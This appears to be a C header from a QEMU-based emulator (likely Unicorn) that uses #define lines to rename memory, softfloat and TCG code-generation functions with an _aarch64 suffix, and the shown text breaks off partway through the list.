#define ram_block_discard_range ram_block_discard_range_aarch64
#define ramblock_is_pmem ramblock_is_pmem_aarch64
#define page_size_init page_size_init_aarch64
#define set_preferred_target_page_bits set_preferred_target_page_bits_aarch64
#define finalize_target_page_bits finalize_target_page_bits_aarch64
#define cpu_outb cpu_outb_aarch64
#define cpu_outw cpu_outw_aarch64
#define cpu_outl cpu_outl_aarch64
#define cpu_inb cpu_inb_aarch64
#define cpu_inw cpu_inw_aarch64
#define cpu_inl cpu_inl_aarch64
#define memory_map memory_map_aarch64
#define memory_map_io memory_map_io_aarch64
#define memory_map_ptr memory_map_ptr_aarch64
#define memory_cow memory_cow_aarch64
#define memory_unmap memory_unmap_aarch64
#define memory_moveout memory_moveout_aarch64
#define memory_movein memory_movein_aarch64
#define memory_free memory_free_aarch64
#define flatview_unref flatview_unref_aarch64
#define address_space_get_flatview address_space_get_flatview_aarch64
#define memory_region_transaction_begin memory_region_transaction_begin_aarch64
#define memory_region_transaction_commit memory_region_transaction_commit_aarch64
#define memory_region_init memory_region_init_aarch64
#define memory_region_access_valid memory_region_access_valid_aarch64
#define memory_region_dispatch_read memory_region_dispatch_read_aarch64
#define memory_region_dispatch_write memory_region_dispatch_write_aarch64
#define memory_region_init_io memory_region_init_io_aarch64
#define memory_region_init_ram_ptr memory_region_init_ram_ptr_aarch64
#define memory_region_size memory_region_size_aarch64
#define memory_region_set_readonly memory_region_set_readonly_aarch64
#define memory_region_get_ram_ptr memory_region_get_ram_ptr_aarch64
#define memory_region_from_host memory_region_from_host_aarch64
#define memory_region_get_ram_addr memory_region_get_ram_addr_aarch64
#define memory_region_add_subregion memory_region_add_subregion_aarch64
#define memory_region_del_subregion memory_region_del_subregion_aarch64
#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_aarch64
#define memory_region_find memory_region_find_aarch64
#define memory_region_filter_subregions memory_region_filter_subregions_aarch64
#define memory_listener_register memory_listener_register_aarch64
#define memory_listener_unregister memory_listener_unregister_aarch64
#define address_space_remove_listeners address_space_remove_listeners_aarch64
#define address_space_init address_space_init_aarch64
#define address_space_destroy address_space_destroy_aarch64
#define memory_region_init_ram memory_region_init_ram_aarch64
#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_aarch64
#define find_memory_mapping find_memory_mapping_aarch64
#define exec_inline_op exec_inline_op_aarch64
#define floatx80_default_nan floatx80_default_nan_aarch64
#define float_raise float_raise_aarch64
#define float16_is_quiet_nan float16_is_quiet_nan_aarch64
#define float16_is_signaling_nan float16_is_signaling_nan_aarch64
#define float32_is_quiet_nan float32_is_quiet_nan_aarch64
#define float32_is_signaling_nan float32_is_signaling_nan_aarch64
#define float64_is_quiet_nan float64_is_quiet_nan_aarch64
#define float64_is_signaling_nan float64_is_signaling_nan_aarch64
#define floatx80_is_quiet_nan floatx80_is_quiet_nan_aarch64
#define floatx80_is_signaling_nan floatx80_is_signaling_nan_aarch64
#define floatx80_silence_nan floatx80_silence_nan_aarch64
#define propagateFloatx80NaN propagateFloatx80NaN_aarch64
#define float128_is_quiet_nan float128_is_quiet_nan_aarch64
#define float128_is_signaling_nan float128_is_signaling_nan_aarch64
#define float128_silence_nan float128_silence_nan_aarch64
#define float16_add float16_add_aarch64
#define float16_sub float16_sub_aarch64
#define float32_add float32_add_aarch64
#define float32_sub float32_sub_aarch64
#define float64_add float64_add_aarch64
#define float64_sub float64_sub_aarch64
#define float16_mul float16_mul_aarch64
#define float32_mul float32_mul_aarch64
#define float64_mul float64_mul_aarch64
#define float16_muladd float16_muladd_aarch64
#define float32_muladd float32_muladd_aarch64
#define float64_muladd float64_muladd_aarch64
#define float16_div float16_div_aarch64
#define float32_div float32_div_aarch64
#define float64_div float64_div_aarch64
#define float16_to_float32 float16_to_float32_aarch64
#define float16_to_float64 float16_to_float64_aarch64
#define float32_to_float16 float32_to_float16_aarch64
#define float32_to_float64 float32_to_float64_aarch64
#define float64_to_float16 float64_to_float16_aarch64
#define float64_to_float32 float64_to_float32_aarch64
#define float16_round_to_int float16_round_to_int_aarch64
#define float32_round_to_int float32_round_to_int_aarch64
#define float64_round_to_int float64_round_to_int_aarch64
#define float16_to_int16_scalbn float16_to_int16_scalbn_aarch64
#define float16_to_int32_scalbn float16_to_int32_scalbn_aarch64
#define float16_to_int64_scalbn float16_to_int64_scalbn_aarch64
#define float32_to_int16_scalbn float32_to_int16_scalbn_aarch64
#define float32_to_int32_scalbn float32_to_int32_scalbn_aarch64
#define float32_to_int64_scalbn float32_to_int64_scalbn_aarch64
#define float64_to_int16_scalbn float64_to_int16_scalbn_aarch64
#define float64_to_int32_scalbn float64_to_int32_scalbn_aarch64
#define float64_to_int64_scalbn float64_to_int64_scalbn_aarch64
#define float16_to_int16 float16_to_int16_aarch64
#define float16_to_int32 float16_to_int32_aarch64
#define float16_to_int64 float16_to_int64_aarch64
#define float32_to_int16 float32_to_int16_aarch64
#define float32_to_int32 float32_to_int32_aarch64
#define float32_to_int64 float32_to_int64_aarch64
#define float64_to_int16 float64_to_int16_aarch64
#define float64_to_int32 float64_to_int32_aarch64
#define float64_to_int64 float64_to_int64_aarch64
#define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_aarch64
#define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_aarch64
#define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_aarch64
#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_aarch64
#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_aarch64
#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_aarch64
#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_aarch64
#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_aarch64
#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_aarch64
#define float16_to_uint16_scalbn float16_to_uint16_scalbn_aarch64
#define float16_to_uint32_scalbn float16_to_uint32_scalbn_aarch64
#define float16_to_uint64_scalbn float16_to_uint64_scalbn_aarch64
#define float32_to_uint16_scalbn float32_to_uint16_scalbn_aarch64
#define float32_to_uint32_scalbn float32_to_uint32_scalbn_aarch64
#define float32_to_uint64_scalbn float32_to_uint64_scalbn_aarch64
#define float64_to_uint16_scalbn float64_to_uint16_scalbn_aarch64
#define float64_to_uint32_scalbn float64_to_uint32_scalbn_aarch64
#define float64_to_uint64_scalbn float64_to_uint64_scalbn_aarch64
#define float16_to_uint16 float16_to_uint16_aarch64
#define float16_to_uint32 float16_to_uint32_aarch64
#define float16_to_uint64 float16_to_uint64_aarch64
#define float32_to_uint16 float32_to_uint16_aarch64
#define float32_to_uint32 float32_to_uint32_aarch64
#define float32_to_uint64 float32_to_uint64_aarch64
#define float64_to_uint16 float64_to_uint16_aarch64
#define float64_to_uint32 float64_to_uint32_aarch64
#define float64_to_uint64 float64_to_uint64_aarch64
#define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_aarch64
#define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_aarch64
#define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_aarch64
#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_aarch64
#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_aarch64
#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_aarch64
#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_aarch64
#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_aarch64
#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_aarch64
#define int64_to_float16_scalbn int64_to_float16_scalbn_aarch64
#define int32_to_float16_scalbn int32_to_float16_scalbn_aarch64
#define int16_to_float16_scalbn int16_to_float16_scalbn_aarch64
#define int64_to_float16 int64_to_float16_aarch64
#define int32_to_float16 int32_to_float16_aarch64
#define int16_to_float16 int16_to_float16_aarch64
#define int64_to_float32_scalbn int64_to_float32_scalbn_aarch64
#define int32_to_float32_scalbn int32_to_float32_scalbn_aarch64
#define int16_to_float32_scalbn int16_to_float32_scalbn_aarch64
#define int64_to_float32 int64_to_float32_aarch64
#define int32_to_float32 int32_to_float32_aarch64
#define int16_to_float32 int16_to_float32_aarch64
#define int64_to_float64_scalbn int64_to_float64_scalbn_aarch64
#define int32_to_float64_scalbn int32_to_float64_scalbn_aarch64
#define int16_to_float64_scalbn int16_to_float64_scalbn_aarch64
#define int64_to_float64 int64_to_float64_aarch64
#define int32_to_float64 int32_to_float64_aarch64
#define int16_to_float64 int16_to_float64_aarch64
#define uint64_to_float16_scalbn uint64_to_float16_scalbn_aarch64
#define uint32_to_float16_scalbn uint32_to_float16_scalbn_aarch64
#define uint16_to_float16_scalbn uint16_to_float16_scalbn_aarch64
#define uint64_to_float16 uint64_to_float16_aarch64
#define uint32_to_float16 uint32_to_float16_aarch64
#define uint16_to_float16 uint16_to_float16_aarch64
#define uint64_to_float32_scalbn uint64_to_float32_scalbn_aarch64
#define uint32_to_float32_scalbn uint32_to_float32_scalbn_aarch64
#define uint16_to_float32_scalbn uint16_to_float32_scalbn_aarch64
#define uint64_to_float32 uint64_to_float32_aarch64
#define uint32_to_float32 uint32_to_float32_aarch64
#define uint16_to_float32 uint16_to_float32_aarch64
#define uint64_to_float64_scalbn uint64_to_float64_scalbn_aarch64
#define uint32_to_float64_scalbn uint32_to_float64_scalbn_aarch64
#define uint16_to_float64_scalbn uint16_to_float64_scalbn_aarch64
#define uint64_to_float64 uint64_to_float64_aarch64
#define uint32_to_float64 uint32_to_float64_aarch64
#define uint16_to_float64 uint16_to_float64_aarch64
#define float16_min float16_min_aarch64
#define float16_minnum float16_minnum_aarch64
#define float16_minnummag float16_minnummag_aarch64
#define float16_max float16_max_aarch64
#define float16_maxnum float16_maxnum_aarch64
#define float16_maxnummag float16_maxnummag_aarch64
#define float32_min float32_min_aarch64
#define float32_minnum float32_minnum_aarch64
#define float32_minnummag float32_minnummag_aarch64
#define float32_max float32_max_aarch64
#define float32_maxnum float32_maxnum_aarch64
#define float32_maxnummag float32_maxnummag_aarch64
#define float64_min float64_min_aarch64
#define float64_minnum float64_minnum_aarch64
#define float64_minnummag float64_minnummag_aarch64
#define float64_max float64_max_aarch64
#define float64_maxnum float64_maxnum_aarch64
#define float64_maxnummag float64_maxnummag_aarch64
#define float16_compare float16_compare_aarch64
#define float16_compare_quiet float16_compare_quiet_aarch64
#define float32_compare float32_compare_aarch64
#define float32_compare_quiet float32_compare_quiet_aarch64
#define float64_compare float64_compare_aarch64
#define float64_compare_quiet float64_compare_quiet_aarch64
#define float16_scalbn float16_scalbn_aarch64
#define float32_scalbn float32_scalbn_aarch64
#define float64_scalbn float64_scalbn_aarch64
#define float16_sqrt float16_sqrt_aarch64
#define float32_sqrt float32_sqrt_aarch64
#define float64_sqrt float64_sqrt_aarch64
#define float16_default_nan float16_default_nan_aarch64
#define float32_default_nan float32_default_nan_aarch64
#define float64_default_nan float64_default_nan_aarch64
#define float128_default_nan float128_default_nan_aarch64
#define float16_silence_nan float16_silence_nan_aarch64
#define float32_silence_nan float32_silence_nan_aarch64
#define float64_silence_nan float64_silence_nan_aarch64
#define float16_squash_input_denormal float16_squash_input_denormal_aarch64
#define float32_squash_input_denormal float32_squash_input_denormal_aarch64
#define float64_squash_input_denormal float64_squash_input_denormal_aarch64
#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_aarch64
#define roundAndPackFloatx80 roundAndPackFloatx80_aarch64
#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_aarch64
#define int32_to_floatx80 int32_to_floatx80_aarch64
#define int32_to_float128 int32_to_float128_aarch64
#define int64_to_floatx80 int64_to_floatx80_aarch64
#define int64_to_float128 int64_to_float128_aarch64
#define uint64_to_float128 uint64_to_float128_aarch64
#define float32_to_floatx80 float32_to_floatx80_aarch64
#define float32_to_float128 float32_to_float128_aarch64
#define float32_rem float32_rem_aarch64
#define float32_exp2 float32_exp2_aarch64
#define float32_log2 float32_log2_aarch64
#define float32_eq float32_eq_aarch64
#define float32_le float32_le_aarch64
#define float32_lt float32_lt_aarch64
#define float32_unordered float32_unordered_aarch64
#define float32_eq_quiet float32_eq_quiet_aarch64
#define float32_le_quiet float32_le_quiet_aarch64
#define float32_lt_quiet float32_lt_quiet_aarch64
#define float32_unordered_quiet float32_unordered_quiet_aarch64
#define float64_to_floatx80 float64_to_floatx80_aarch64
#define float64_to_float128 float64_to_float128_aarch64
#define float64_rem float64_rem_aarch64
#define float64_log2 float64_log2_aarch64
#define float64_eq float64_eq_aarch64
#define float64_le float64_le_aarch64
#define float64_lt float64_lt_aarch64
#define float64_unordered float64_unordered_aarch64
#define float64_eq_quiet float64_eq_quiet_aarch64
#define float64_le_quiet float64_le_quiet_aarch64
#define float64_lt_quiet float64_lt_quiet_aarch64
#define float64_unordered_quiet float64_unordered_quiet_aarch64
#define floatx80_to_int32 floatx80_to_int32_aarch64
#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_aarch64
#define floatx80_to_int64 floatx80_to_int64_aarch64
#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_aarch64
#define floatx80_to_float32 floatx80_to_float32_aarch64
#define floatx80_to_float64 floatx80_to_float64_aarch64
#define floatx80_to_float128 floatx80_to_float128_aarch64
#define floatx80_round floatx80_round_aarch64
#define floatx80_round_to_int floatx80_round_to_int_aarch64
#define floatx80_add floatx80_add_aarch64
#define floatx80_sub floatx80_sub_aarch64
#define floatx80_mul floatx80_mul_aarch64
#define floatx80_div floatx80_div_aarch64
#define floatx80_rem floatx80_rem_aarch64
#define floatx80_sqrt floatx80_sqrt_aarch64
#define floatx80_eq floatx80_eq_aarch64
#define floatx80_le floatx80_le_aarch64
#define floatx80_lt floatx80_lt_aarch64
#define floatx80_unordered floatx80_unordered_aarch64
#define floatx80_eq_quiet floatx80_eq_quiet_aarch64
#define floatx80_le_quiet floatx80_le_quiet_aarch64
#define floatx80_lt_quiet floatx80_lt_quiet_aarch64
#define floatx80_unordered_quiet floatx80_unordered_quiet_aarch64
#define float128_to_int32 float128_to_int32_aarch64
#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_aarch64
#define float128_to_int64 float128_to_int64_aarch64
#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_aarch64
#define float128_to_uint64 float128_to_uint64_aarch64
#define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_aarch64
#define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_aarch64
#define float128_to_uint32 float128_to_uint32_aarch64
#define float128_to_float32 float128_to_float32_aarch64
#define float128_to_float64 float128_to_float64_aarch64
#define float128_to_floatx80 float128_to_floatx80_aarch64
#define float128_round_to_int float128_round_to_int_aarch64
#define float128_add float128_add_aarch64
#define float128_sub float128_sub_aarch64
#define float128_mul float128_mul_aarch64
#define float128_div float128_div_aarch64
#define float128_rem float128_rem_aarch64
#define float128_sqrt float128_sqrt_aarch64
#define float128_eq float128_eq_aarch64
#define float128_le float128_le_aarch64
#define float128_lt float128_lt_aarch64
#define float128_unordered float128_unordered_aarch64
#define float128_eq_quiet float128_eq_quiet_aarch64
#define float128_le_quiet float128_le_quiet_aarch64
#define float128_lt_quiet float128_lt_quiet_aarch64
#define float128_unordered_quiet float128_unordered_quiet_aarch64
#define floatx80_compare floatx80_compare_aarch64
#define floatx80_compare_quiet floatx80_compare_quiet_aarch64
#define float128_compare float128_compare_aarch64
#define float128_compare_quiet float128_compare_quiet_aarch64
#define floatx80_scalbn floatx80_scalbn_aarch64
#define float128_scalbn float128_scalbn_aarch64
#define softfloat_init softfloat_init_aarch64
#define tcg_optimize tcg_optimize_aarch64
#define gen_new_label gen_new_label_aarch64
#define tcg_can_emit_vec_op tcg_can_emit_vec_op_aarch64
#define tcg_expand_vec_op tcg_expand_vec_op_aarch64
#define tcg_register_jit tcg_register_jit_aarch64
#define tcg_tb_insert tcg_tb_insert_aarch64
#define tcg_tb_remove tcg_tb_remove_aarch64
#define tcg_tb_lookup tcg_tb_lookup_aarch64
#define tcg_tb_foreach tcg_tb_foreach_aarch64
#define tcg_nb_tbs tcg_nb_tbs_aarch64
#define tcg_region_reset_all tcg_region_reset_all_aarch64
#define tcg_region_init tcg_region_init_aarch64
#define tcg_code_size tcg_code_size_aarch64
#define tcg_code_capacity tcg_code_capacity_aarch64
#define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_aarch64
#define tcg_malloc_internal tcg_malloc_internal_aarch64
#define tcg_pool_reset tcg_pool_reset_aarch64
#define tcg_context_init tcg_context_init_aarch64
#define tcg_tb_alloc tcg_tb_alloc_aarch64
#define tcg_prologue_init tcg_prologue_init_aarch64
#define tcg_func_start tcg_func_start_aarch64
#define tcg_set_frame tcg_set_frame_aarch64
#define tcg_global_mem_new_internal tcg_global_mem_new_internal_aarch64
#define tcg_temp_new_internal tcg_temp_new_internal_aarch64
#define tcg_temp_new_vec tcg_temp_new_vec_aarch64
#define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_aarch64
#define tcg_temp_free_internal tcg_temp_free_internal_aarch64
#define tcg_const_i32 tcg_const_i32_aarch64
#define tcg_const_i64 tcg_const_i64_aarch64
#define tcg_const_local_i32 tcg_const_local_i32_aarch64
#define tcg_const_local_i64 tcg_const_local_i64_aarch64
#define tcg_op_supported tcg_op_supported_aarch64
#define tcg_gen_callN tcg_gen_callN_aarch64
#define tcg_op_remove tcg_op_remove_aarch64
#define tcg_emit_op tcg_emit_op_aarch64
#define tcg_op_insert_before tcg_op_insert_before_aarch64
#define tcg_op_insert_after tcg_op_insert_after_aarch64
#define tcg_cpu_exec_time tcg_cpu_exec_time_aarch64
#define tcg_gen_code tcg_gen_code_aarch64
#define tcg_gen_op1 tcg_gen_op1_aarch64
#define tcg_gen_op2 tcg_gen_op2_aarch64
#define tcg_gen_op3 tcg_gen_op3_aarch64
#define tcg_gen_op4 tcg_gen_op4_aarch64
#define tcg_gen_op5 tcg_gen_op5_aarch64
#define tcg_gen_op6 tcg_gen_op6_aarch64
#define tcg_gen_mb tcg_gen_mb_aarch64
#define tcg_gen_addi_i32 tcg_gen_addi_i32_aarch64
#define tcg_gen_subfi_i32 tcg_gen_subfi_i32_aarch64
#define tcg_gen_subi_i32 tcg_gen_subi_i32_aarch64
#define tcg_gen_andi_i32 tcg_gen_andi_i32_aarch64
#define tcg_gen_ori_i32 tcg_gen_ori_i32_aarch64
#define tcg_gen_xori_i32 tcg_gen_xori_i32_aarch64
#define tcg_gen_shli_i32 tcg_gen_shli_i32_aarch64
#define tcg_gen_shri_i32 tcg_gen_shri_i32_aarch64
#define tcg_gen_sari_i32 tcg_gen_sari_i32_aarch64
#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_aarch64
#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_aarch64
#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_aarch64
#define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_aarch64
#define tcg_gen_muli_i32 tcg_gen_muli_i32_aarch64
#define tcg_gen_div_i32 tcg_gen_div_i32_aarch64
#define tcg_gen_rem_i32 tcg_gen_rem_i32_aarch64
#define tcg_gen_divu_i32 tcg_gen_divu_i32_aarch64
#define tcg_gen_remu_i32 tcg_gen_remu_i32_aarch64
#define tcg_gen_andc_i32 tcg_gen_andc_i32_aarch64
#define tcg_gen_eqv_i32 tcg_gen_eqv_i32_aarch64
#define tcg_gen_nand_i32 tcg_gen_nand_i32_aarch64
#define tcg_gen_nor_i32 tcg_gen_nor_i32_aarch64
#define tcg_gen_orc_i32 tcg_gen_orc_i32_aarch64
#define tcg_gen_clz_i32 tcg_gen_clz_i32_aarch64
#define tcg_gen_clzi_i32 tcg_gen_clzi_i32_aarch64
#define tcg_gen_ctz_i32 tcg_gen_ctz_i32_aarch64
#define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_aarch64
#define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_aarch64
#define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_aarch64
#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_aarch64
#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_aarch64
#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_aarch64
#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_aarch64
#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_aarch64
#define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_aarch64
#define tcg_gen_extract_i32 tcg_gen_extract_i32_aarch64
#define tcg_gen_sextract_i32 tcg_gen_sextract_i32_aarch64
#define tcg_gen_extract2_i32 tcg_gen_extract2_i32_aarch64
#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_aarch64
#define tcg_gen_add2_i32 tcg_gen_add2_i32_aarch64
#define tcg_gen_sub2_i32 tcg_gen_sub2_i32_aarch64
#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_aarch64
#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_aarch64
#define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_aarch64
#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_aarch64
#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_aarch64
#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_aarch64
#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_aarch64
#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_aarch64
#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_aarch64
#define tcg_gen_smin_i32 tcg_gen_smin_i32_aarch64
#define tcg_gen_umin_i32 tcg_gen_umin_i32_aarch64
#define tcg_gen_smax_i32 tcg_gen_smax_i32_aarch64
#define tcg_gen_umax_i32 tcg_gen_umax_i32_aarch64
#define tcg_gen_abs_i32 tcg_gen_abs_i32_aarch64
#define tcg_gen_addi_i64 tcg_gen_addi_i64_aarch64
#define tcg_gen_subfi_i64 tcg_gen_subfi_i64_aarch64
#define tcg_gen_subi_i64 tcg_gen_subi_i64_aarch64
#define tcg_gen_andi_i64 tcg_gen_andi_i64_aarch64
#define tcg_gen_ori_i64 tcg_gen_ori_i64_aarch64
#define tcg_gen_xori_i64 tcg_gen_xori_i64_aarch64
#define tcg_gen_shli_i64 tcg_gen_shli_i64_aarch64
#define tcg_gen_shri_i64 tcg_gen_shri_i64_aarch64
#define tcg_gen_sari_i64 tcg_gen_sari_i64_aarch64
#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_aarch64
#define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_aarch64
#define tcg_gen_setcond_i64 tcg_gen_setcond_i64_aarch64
#define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_aarch64
#define tcg_gen_muli_i64 tcg_gen_muli_i64_aarch64
#define tcg_gen_div_i64 tcg_gen_div_i64_aarch64
#define tcg_gen_rem_i64 tcg_gen_rem_i64_aarch64
#define tcg_gen_divu_i64 tcg_gen_divu_i64_aarch64
#define tcg_gen_remu_i64 tcg_gen_remu_i64_aarch64
#define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_aarch64
#define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_aarch64
#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_aarch64
#define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_aarch64
#define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_aarch64
#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_aarch64
#define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_aarch64
#define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_aarch64
#define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_aarch64
#define tcg_gen_not_i64 tcg_gen_not_i64_aarch64
#define tcg_gen_andc_i64
tcg_gen_andc_i64_aarch64 #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_aarch64 #define tcg_gen_nand_i64 tcg_gen_nand_i64_aarch64 #define tcg_gen_nor_i64 tcg_gen_nor_i64_aarch64 #define tcg_gen_orc_i64 tcg_gen_orc_i64_aarch64 #define tcg_gen_clz_i64 tcg_gen_clz_i64_aarch64 #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_aarch64 #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_aarch64 #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_aarch64 #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_aarch64 #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_aarch64 #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_aarch64 #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_aarch64 #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_aarch64 #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_aarch64 #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_aarch64 #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_aarch64 #define tcg_gen_extract_i64 tcg_gen_extract_i64_aarch64 #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_aarch64 #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_aarch64 #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_aarch64 #define tcg_gen_add2_i64 tcg_gen_add2_i64_aarch64 #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_aarch64 #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_aarch64 #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_aarch64 #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_aarch64 #define tcg_gen_smin_i64 tcg_gen_smin_i64_aarch64 #define tcg_gen_umin_i64 tcg_gen_umin_i64_aarch64 #define tcg_gen_smax_i64 tcg_gen_smax_i64_aarch64 #define tcg_gen_umax_i64 tcg_gen_umax_i64_aarch64 #define tcg_gen_abs_i64 tcg_gen_abs_i64_aarch64 #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_aarch64 #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_aarch64 #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_aarch64 #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_aarch64 #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_aarch64 #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_aarch64 #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_aarch64 #define tcg_gen_exit_tb tcg_gen_exit_tb_aarch64 #define tcg_gen_goto_tb tcg_gen_goto_tb_aarch64 #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_aarch64 #define check_exit_request check_exit_request_aarch64 #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_aarch64 #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_aarch64 #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_aarch64 #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_aarch64 #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_aarch64 #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_aarch64 #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_aarch64 #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_aarch64 #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_aarch64 #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_aarch64 #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_aarch64 #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_aarch64 #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_aarch64 #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_aarch64 #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_aarch64 #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_aarch64 #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_aarch64 #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_aarch64 #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_aarch64 #define 
tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_aarch64 #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_aarch64 #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_aarch64 #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_aarch64 #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_aarch64 #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_aarch64 #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_aarch64 #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_aarch64 #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_aarch64 #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_aarch64 #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_aarch64 #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_aarch64 #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_aarch64 #define tcg_gen_atomic_umin_fetch_i32 